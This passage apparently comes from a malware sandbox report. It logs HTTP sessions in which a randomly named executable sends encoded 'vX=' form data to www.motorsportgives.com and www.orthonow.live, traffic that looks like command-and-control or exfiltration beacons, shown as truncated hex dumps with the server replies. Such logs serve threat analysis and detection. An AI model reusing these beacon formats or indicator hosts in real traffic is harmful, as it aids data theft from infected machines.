                                                            Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                            Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.11.204977974.208.236.230807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:35:34.479335070 CEST1143OUTPOST /9qp3/ HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.motorsportgives.com
                                                            Referer: http://www.motorsportgives.com/9qp3/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 55 58 77 4f 37 51 47 48 4a 4d 4b 54 59 35 63 41 39 35 66 34 56 6a 72 52 4a 44 44 56 53 65 4f 77 4b 6a 2f 75 46 57 79 78 79 4e 55 54 6e 57 2b 6c 4a 74 67 5a 59 6b 6b 56 6e 61 67 64 6c 6e 4a 70 65 7a 4d 51 73 41 6c 69 4e 77 53 35 6c 55 39 47 64 39 35 65 55 50 59 7a 52 31 2f 35 4b 6d 30 2b 6a 65 4c 78 2f 59 49 4a 4a 64 30 59 45 7a 48 4a 43 74 62 6f 79 77 67 6f 53 56 70 6c 38 69 6a 39 77 4b 54 41 50 5a 35 2f 46 51 36 46 50 38 4d 2f 39 57 68 2b 4c 70 53 30 2f 64 74 6b 36 65 52 48 73 45 52 69 2b 77 59 32 68 72 78 6d 30 48 71 77 34 47 66 52 35 59 65 4d 47 4e 37 65 6a 33 45 2b 32 4e 74 48 6b 4c 58 4b 2b 54 6d 38 54 6a 4c 2b 65 77 68 31 4d 4f 47 57 77 33 4d 6d 6b 67 43 4a 32 53 4b 69 6a 45 64 67 31 67 79 63 4d 4e 74 4b 45 69 4e 6a 62 42 62 72 66 61 70 7a 72 6f 4b 34 64 48 48 4e 5a 55 4d 6b 63 51 49 4f 75 6a 74 6c 66 33 41 38 62 67 2f 38 57 78 56 71 71 5a 62 41 48 67 6c 77 41 71 46 39 47 67 58 7a 55 79 46 36 51 36 39 57 6a 43 62 51 39 54 54 2b 61 62 7a 6e 4c 6f 4a 53 6e 6d 77 45 2f 42 49 75 4e 2b 57 [TRUNCATED]
                                                            Data Ascii: vX=UXwO7QGHJMKTY5cA95f4VjrRJDDVSeOwKj/uFWyxyNUTnW+lJtgZYkkVnagdlnJpezMQsAliNwS5lU9Gd95eUPYzR1/5Km0+jeLx/YIJJd0YEzHJCtboywgoSVpl8ij9wKTAPZ5/FQ6FP8M/9Wh+LpS0/dtk6eRHsERi+wY2hrxm0Hqw4GfR5YeMGN7ej3E+2NtHkLXK+Tm8TjL+ewh1MOGWw3MmkgCJ2SKijEdg1gycMNtKEiNjbBbrfapzroK4dHHNZUMkcQIOujtlf3A8bg/8WxVqqZbAHglwAqF9GgXzUyF6Q69WjCbQ9TT+abznLoJSnmwE/BIuN+WGjYzDqKtgR/4wsYh4Fdt2S1LvQwaRUPXjsllS6LMgjXmPOK30ZOIAk9ocSmzRrGVQDm5t5dudLgB63+3pXMERzHpZp9+nnzNuosPluCplePUWg75DkHpkzNtHbzZzrcyVdWoPWXq7vJ220bX5gIQkshLPrGX7uh2elfSDzgKbPNpapc92LZAPCgTDrFJN0SNN7QwcQ+I=
                                                            Jul 3, 2024 17:35:34.617757082 CEST580INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:35:34 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip
                                                            Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                            Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.11.204978074.208.236.230807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:35:37.165724993 CEST9023OUTPOST /9qp3/ HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.motorsportgives.com
                                                            Referer: http://www.motorsportgives.com/9qp3/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 55 58 77 4f 37 51 47 48 4a 4d 4b 54 59 35 63 41 39 35 66 34 56 6a 72 52 4a 44 44 56 53 65 4f 77 4b 6a 2f 75 46 57 79 78 79 4e 4d 54 6e 67 79 6c 49 4f 49 5a 5a 6b 6b 56 34 71 67 63 6c 6e 4a 6f 65 7a 45 55 73 41 6f 66 4e 32 65 35 6d 45 4e 47 65 49 56 65 65 76 59 79 53 31 2f 2f 64 32 31 2f 6a 65 47 6d 2f 59 4d 33 4b 74 77 59 46 30 6a 4a 47 62 54 72 2b 41 67 75 53 56 70 54 34 69 6a 44 77 4b 6d 4c 50 63 68 2f 46 53 65 46 4d 71 41 2f 2f 42 56 2b 43 5a 53 33 6d 4e 74 72 30 2b 51 39 73 45 56 63 2b 77 59 4d 68 71 46 6d 30 46 69 77 2f 48 66 53 35 34 65 4d 61 64 37 64 31 48 49 36 32 4e 67 53 6b 4b 54 4b 2b 54 4f 38 4a 44 4c 2b 59 56 42 32 46 4f 47 51 6d 48 4e 6d 67 67 47 42 32 53 65 63 6a 41 46 67 31 52 57 63 4d 36 42 4b 44 44 4e 6a 53 42 62 70 41 4b 70 61 6c 49 4c 37 64 44 6a 72 5a 56 73 30 63 51 73 4f 76 43 4e 6c 4a 47 41 7a 64 41 2b 33 49 68 56 46 75 5a 58 45 48 67 30 79 41 71 46 74 47 68 6a 7a 58 44 31 36 54 2f 4a 5a 75 79 62 54 70 6a 53 38 54 37 2f 70 4c 70 6c 61 6e 6c 67 55 2f 43 6b 75 4d 65 57 [TRUNCATED]
                                                            Data Ascii: vX=UXwO7QGHJMKTY5cA95f4VjrRJDDVSeOwKj/uFWyxyNMTngylIOIZZkkV4qgclnJoezEUsAofN2e5mENGeIVeevYyS1//d21/jeGm/YM3KtwYF0jJGbTr+AguSVpT4ijDwKmLPch/FSeFMqA//BV+CZS3mNtr0+Q9sEVc+wYMhqFm0Fiw/HfS54eMad7d1HI62NgSkKTK+TO8JDL+YVB2FOGQmHNmggGB2SecjAFg1RWcM6BKDDNjSBbpAKpalIL7dDjrZVs0cQsOvCNlJGAzdA+3IhVFuZXEHg0yAqFtGhjzXD16T/JZuybTpjS8T7/pLplanlgU/CkuMeWGoabCzqtjZf4mxIhvFdxAS3maXDeRU/njmVlRxLMsp3mJY630ZOEUk90cS3LRoUdQIVht7dubLgBr3+7aXM9CzGZzp/SnpHButo7m5ypkNfVW+L9UkH1azNdIbEpztouVZWoMS3q8oJ28lLL1gI8ashPfrFX7+wLKh8WssSSAL+V/tat4I4QoPBCup1Ae7x1WmhRcH7c8PaVZ4fBd52rAynhDqyCIs/buBBsdJn8v9MRQgmNWLf1oKg+gSfF4ULbYxkxg0auY5MGxQQnWep0Vokh6ZD5+X3xG4z4CL/PmxtkJbre6F24c2TWWf2MLDpTN3Pp16n9sPiaGcPlxK4C1+Vt1x8ULluBs8KIyKOSJCns1NvZV7PmRUP9J3cPKDrzHvA0v0jJZzBZ2HYgCU0cwYXrDGG3lrKvY+jUQvIAujXTDlXNAlK3IIsOrdFA1WhmLbKzhhaBevSS6DcAPrTjGRwcrSq2NDCaedSnOVmfyjg7+omxtXMun0lwV4HEN1ooNhOD7Y2QVgJRWw6mkUPQfNtPRdPGrzElPaOhobREprtE8fhVJtyOkrf9Fy0pSMC//GxjlZQ7QsouVkPokoZOriVH8RiuFTj19clpM03WLgp/2FJvO5Q1IS7UgbZ73ZBm+KkTjxxvvepaFKRRxjeIRBbjEPz2F92Zzp [TRUNCATED]
                                                            Jul 3, 2024 17:35:37.165774107 CEST3867OUTData Raw: 75 4d 58 50 65 46 63 6e 32 2b 76 63 35 4c 45 37 76 4c 70 56 46 4b 70 46 37 6c 2f 58 45 6e 78 78 62 54 49 7a 69 34 75 6e 54 71 5a 4a 59 44 36 36 53 43 7a 72 68 59 54 4e 67 70 53 61 6c 58 54 4c 53 6f 68 41 34 2f 53 7a 47 68 2f 6b 65 72 30 31 74 52
                                                            Data Ascii: uMXPeFcn2+vc5LE7vLpVFKpF7l/XEnxxbTIzi4unTqZJYD66SCzrhYTNgpSalXTLSohA4/SzGh/ker01tRyYqUTJFnM/hHRTKMeCYwIunVoM7CIKxaUH2GS0nm+iHeelEzhx1+qVSDW46HLhiXZrqsd0nUSWOa1PbpMoBqSDD81k7utLH1liYyH4kefH1jvdoGUW78s3Z0y8A7C+s3vVGfpAnL7Ls7RZzlpmXcm6iHsjq2gWHUj
                                                            Jul 3, 2024 17:35:37.297622919 CEST2578OUTData Raw: 64 49 64 77 62 59 68 41 30 74 69 36 59 4a 31 73 4c 7a 48 53 67 41 49 37 48 45 69 34 4e 35 6b 7a 31 4c 53 61 54 71 58 4a 62 6b 6e 69 6e 4f 38 5a 51 47 37 53 73 54 6d 2f 59 49 53 79 4d 49 53 30 6f 4c 69 75 53 58 34 65 32 42 7a 52 58 5a 61 46 47 72
                                                            Data Ascii: dIdwbYhA0ti6YJ1sLzHSgAI7HEi4N5kz1LSaTqXJbkninO8ZQG7SsTm/YISyMIS0oLiuSX4e2BzRXZaFGr+yD5ykE7xCfMXuYsXdJDskmm24FE23pRluQiXOkzS0worERr+IzyY6y6O1VmNQLXlVAoiqA1SxHO0rFrKhJahXc/jMU+XJmIJ7qnGeeIIlromjKgYza4Qk/tZOw5W0Hz61N1zuitb14iBjBYP71zcOZWalkbqbHU4
                                                            Jul 3, 2024 17:35:37.297801971 CEST19335OUTData Raw: 4c 68 4b 62 6b 45 44 6c 4e 51 61 78 44 76 6b 6c 50 4c 49 67 76 48 76 62 49 48 6d 50 53 2b 53 6c 63 4e 47 57 58 42 50 48 70 51 5a 35 4a 65 41 77 51 46 73 74 54 6c 37 55 52 58 76 53 48 45 49 68 6a 4e 58 65 76 55 64 33 4d 63 77 7a 78 6b 75 37 6c 6a
                                                            Data Ascii: LhKbkEDlNQaxDvklPLIgvHvbIHmPS+SlcNGWXBPHpQZ5JeAwQFstTl7URXvSHEIhjNXevUd3Mcwzxku7ljXTpmVgqdyLZCTrhHJ0e5JMpxEd2djfKJkh+PljlueHJ/0xujsRn15N4qowrhsd4or8oRrPa7ypLX6n8v9wCrPJmfhDc6iLhQ89MHTOPjb7JIlhkriCKr0BVFFt0GSfT70GpsprlLAJL00heiac2WeajxXqXxWrhz+
                                                            Jul 3, 2024 17:35:37.297959089 CEST3867OUTData Raw: 75 32 64 37 48 46 58 35 73 36 55 4e 4c 47 77 74 4c 65 30 63 42 41 47 61 57 51 65 4c 37 45 64 4d 30 48 4b 6a 45 2f 33 71 6f 33 4b 48 6e 68 6d 4b 62 39 4f 6a 79 42 65 4d 45 4e 50 49 4e 30 35 77 57 72 65 6a 54 31 58 78 4a 32 4d 59 6f 63 4d 4b 36 4f
                                                            Data Ascii: u2d7HFX5s6UNLGwtLe0cBAGaWQeL7EdM0HKjE/3qo3KHnhmKb9OjyBeMENPIN05wWrejT1XxJ2MYocMK6OXg2eeOn064qQNrQ1l7Z6HFSBUB9IvEZs1MemcjCwwwazvgm1qT+efq+iZ3KYTqXgKyeerLz3ehIt6dx85OnFzbBQJPeOtCbVcNasMlTRfqXY/fQNXkqMtff/EZ9x/6a/TwUu+RjMBVimU3iEz1FWWqEAb4dgiKxlz
                                                            Jul 3, 2024 17:35:37.429631948 CEST6445OUTData Raw: 4e 73 33 76 4c 75 64 66 6a 74 4e 2b 43 47 45 45 74 45 62 46 4a 4d 52 6f 43 4d 30 5a 74 4b 5a 67 38 4e 41 4f 6f 53 37 57 6d 48 62 65 72 34 36 31 6a 32 47 4b 56 56 52 34 59 56 63 31 32 30 4e 4e 49 61 64 52 4a 79 2f 66 41 4e 61 34 41 6a 44 59 35 55
                                                            Data Ascii: Ns3vLudfjtN+CGEEtEbFJMRoCM0ZtKZg8NAOoS7WmHber461j2GKVVR4YVc120NNIadRJy/fANa4AjDY5UA5D9TJzRRQfXKm8iy2KPv019cNvUbN9dxYYOiwXHSPPMjVcXbEovVwmGFj03KgOoGRfv4GsVnWNVbtDsoBTW5i01RTP5f6U7l/bPfPa3pb7vJjTsxsSzUDW8IZkgbqnXZdPg2+m/hpqqIJDcO/yHEl0SvYEdZgV+i
                                                            Jul 3, 2024 17:35:37.429821968 CEST6445OUTData Raw: 38 66 70 59 64 62 46 2f 30 6f 7a 30 4e 42 68 31 41 4b 72 50 2b 6a 79 46 79 42 69 41 33 41 62 2b 69 46 55 38 78 76 52 77 75 4d 78 33 77 45 42 6a 38 30 5a 62 47 56 50 36 6a 76 6e 45 61 38 5a 73 4b 4b 39 61 52 68 7a 54 6a 4f 4a 2f 63 66 75 50 78 74
                                                            Data Ascii: 8fpYdbF/0oz0NBh1AKrP+jyFyBiA3Ab+iFU8xvRwuMx3wEBj80ZbGVP6jvnEa8ZsKK9aRhzTjOJ/cfuPxt3/ZM7zhJDBFglc6syuGePI6ZEfScGioK88NrbeDDPWIBxLDJ10SQAjxNsTmmRKtmyNleLdMwnYR9tlcJswOAlHGyxAdo5MZt/Pc+L2Iv/zcctLcB+sphcopJKrud6nNUYxGQeLoxM6dkDQyOgCYpM5/FFYrN95c17
                                                            Jul 3, 2024 17:35:37.429929018 CEST1973OUTData Raw: 4f 47 79 79 32 44 64 4f 54 33 47 6d 72 45 36 30 38 6e 4f 52 38 70 38 44 50 43 58 4b 65 4d 56 38 69 68 65 55 61 41 52 6a 6d 62 63 52 35 47 4f 36 4b 77 44 43 54 49 45 7a 6d 79 6b 45 68 53 42 5a 37 71 33 2f 66 61 59 42 4f 38 6e 62 49 63 6e 2b 52 42
                                                            Data Ascii: OGyy2DdOT3GmrE608nOR8p8DPCXKeMV8iheUaARjmbcR5GO6KwDCTIEzmykEhSBZ7q3/faYBO8nbIcn+RB35FV67c1Dl1v4KqqA2GzKq3FXD7Fz+FvPXhs0gPm+vYrjFMv/8XLqtwyGhgMfaPLxebJv6PenvI0jk09Dtb+D/+8R3efNIq9/R9qEH0qrZBIbaH442BJXemPc4PHm29K1XbgvYCjah1b4kxM9MNPaCOzzRSuINQpd
                                                            Jul 3, 2024 17:35:37.565179110 CEST580INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:35:37 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip
                                                            Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                            Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.11.204978174.208.236.230807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:35:39.849237919 CEST527OUTGET /9qp3/?vX=ZVYu4nT3XPb6D5AnzJCZdD7dAyPNRNa3VWXdQVyX2eJo5TfLIuEqAXNcy5gjyltbfDYrkl4fema7mXoYWaQkTP4cU372CGZgosL9vb0GBN03EULPLqCD5DY=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:35:39.987484932 CEST770INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Content-Length: 626
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:35:39 GMT
                                                            Server: Apache
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.11.2049782199.59.243.226807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:35:45.371922016 CEST785OUTPOST /c7lp/ HTTP/1.1
                                                            Host: www.orthonow.live
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.orthonow.live
                                                            Referer: http://www.orthonow.live/c7lp/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 4e 62 46 30 67 51 34 72 33 2b 43 4b 4b 4d 76 52 56 58 73 2f 39 6c 42 50 32 6b 63 30 34 34 54 4e 4e 7a 7a 62 48 41 61 4f 70 56 5a 51 4a 42 54 39 4b 39 75 4e 69 62 67 6c 4b 6f 7a 62 6d 34 2f 5a 73 67 30 43 45 55 59 68 6a 5a 4d 30 57 72 6d 47 6d 45 5a 53 78 75 31 70 79 64 69 4d 58 6c 59 62 36 58 4e 46 33 45 72 43 32 74 78 72 79 7a 6f 42 6e 66 36 66 4e 73 2b 46 62 58 5a 47 68 47 33 68 77 5a 4a 41 52 75 67 42 50 38 7a 35 61 67 58 6f 59 34 74 46 50 54 4d 79 61 6c 47 2f 63 30 36 52 2b 45 49 67 45 2f 32 64 66 65 61 4d 30 4a 55 42 51 35 2b 51 69 6d 5a 55 4a 39 45 66 4e 4f 70 61 6d 41 3d 3d
                                                            Data Ascii: vX=NbF0gQ4r3+CKKMvRVXs/9lBP2kc044TNNzzbHAaOpVZQJBT9K9uNibglKozbm4/Zsg0CEUYhjZM0WrmGmEZSxu1pydiMXlYb6XNF3ErC2txryzoBnf6fNs+FbXZGhG3hwZJARugBP8z5agXoY4tFPTMyalG/c06R+EIgE/2dfeaM0JUBQ5+QimZUJ9EfNOpamA==
                                                            Jul 3, 2024 17:35:45.512809992 CEST1289INHTTP/1.1 200 OK
                                                            date: Wed, 03 Jul 2024 15:35:45 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1118
                                                            x-request-id: ca35958c-0418-4497-b6af-3fa6909b516c
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vFk822k414W4LEy0WueI+VTSidoXo7JWiQQpNL4wdqrjXci3A5YIfndgTYUPMnSpB446Y/4K6+3mggQkVkyo4g==
                                                            set-cookie: parking_session=ca35958c-0418-4497-b6af-3fa6909b516c; expires=Wed, 03 Jul 2024 15:50:45 GMT; path=/
                                                            connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 46 6b 38 32 32 6b 34 31 34 57 34 4c 45 79 30 57 75 65 49 2b 56 54 53 69 64 6f 58 6f 37 4a 57 69 51 51 70 4e 4c 34 77 64 71 72 6a 58 63 69 33 41 35 59 49 66 6e 64 67 54 59 55 50 4d 6e 53 70 42 34 34 36 59 2f 34 4b 36 2b 33 6d 67 67 51 6b 56 6b 79 6f 34 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 